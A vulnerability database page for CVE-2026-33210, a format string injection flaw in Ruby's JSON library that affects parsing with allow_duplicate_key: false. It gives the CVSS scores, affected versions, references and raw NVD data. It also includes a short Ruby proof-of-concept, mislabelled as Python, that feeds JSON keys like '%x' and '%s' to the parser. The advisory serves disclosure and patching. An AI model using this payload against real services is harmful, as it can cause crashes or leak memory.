CVE-2026-33210

Description

Ruby JSON is a JSON implementation for Ruby. From version 2.14.0 to before versions 2.15.2.1, 2.17.1.2, and 2.19.2, a format string injection vulnerability can lead to denial of service attacks or information disclosure, when the allow_duplicate_key: false parsing option is used to parse user supplied documents. This issue has been patched in versions 2.15.2.1, 2.17.1.2, and 2.19.2.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:ruby-lang:json:*:*:*:*:*:ruby:*:* - VULNERABLE

Ruby JSON 2.14.0 至 2.15.2.1 之前

Ruby JSON 2.17.1.2 之前

Ruby JSON 2.19.2 之前

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

require 'json'

# Demonstration of the format string injection vulnerability
# Triggered by using allow_duplicate_key: false with malicious keys

# Malicious payload containing format string specifiers
# Keys like '%x' or '%s' can cause the parser to crash or leak memory
malicious_json = '{"%x": "value1", "%s": "value2"}'

puts "Attempting to parse malicious JSON..."

begin
  # The vulnerability is triggered specifically when this option is enabled
  parsed_data = JSON.parse(malicious_json, { allow_duplicate_key: false })
  puts "Parsing successful (vulnerable system may have crashed or leaked data):"
  puts parsed_data
rescue ArgumentError => e
  puts "ArgumentError caught: #{e.message}"
rescue => e
  puts "Unexpected error: #{e.class} - #{e.message}"
end

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33210
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33210
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33210/
[4] VulDB https://vuldb.com/cve/CVE-2026-33210
[5] https://github.com/ruby/json/security/advisories/GHSA-3m6g-2423-7cp3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33210", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:46.010", "lastModified": "2026-03-27T21:25:30.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ruby JSON is a JSON implementation for Ruby. From version 2.14.0 to before versions 2.15.2.1, 2.17.1.2, and 2.19.2, a format string injection vulnerability can lead to denial of service attacks or information disclosure, when the allow_duplicate_key: false parsing option is used to parse user supplied documents. This issue has been patched in versions 2.15.2.1, 2.17.1.2, and 2.19.2."}, {"lang": "es", "value": "Ruby JSON es una implementación de JSON para Ruby. Desde la versión 2.14.0 hasta antes de las versiones 2.15.2.1, 2.17.1.2 y 2.19.2, una vulnerabilidad de inyección de cadena de formato puede llevar a ataques de denegación de servicio o revelación de información, cuando la opción de análisis allow_duplicate_key: false se utiliza para analizar documentos proporcionados por el usuario. Este problema ha sido parcheado en las versiones 2.15.2.1, 2.17.1.2 y 2.19.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-134"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:json:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "2.14.0", "versionEndExcluding": "2.15.2.1", "matchCriteriaId": "3F2AC3C1-58ED-41B9-B126-0FF2E3D8CAC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:json:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "2.16.0", "versionEndExcluding": "2.17.1.2", "matchCriteriaId": "D822BD02-FB8E-41D7-BD9A-2A166B343A81"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:json:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "2.18.0", "versionEndExcluding": "2.19.2", "matchCriteriaId": "C264EF03-AD00-430B-BAD6-85D5F56787CF"}]}]}], "references": [{"url": "https://github.com/ruby/json/security/advisories/GHSA-3m6g-2423-7cp3", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}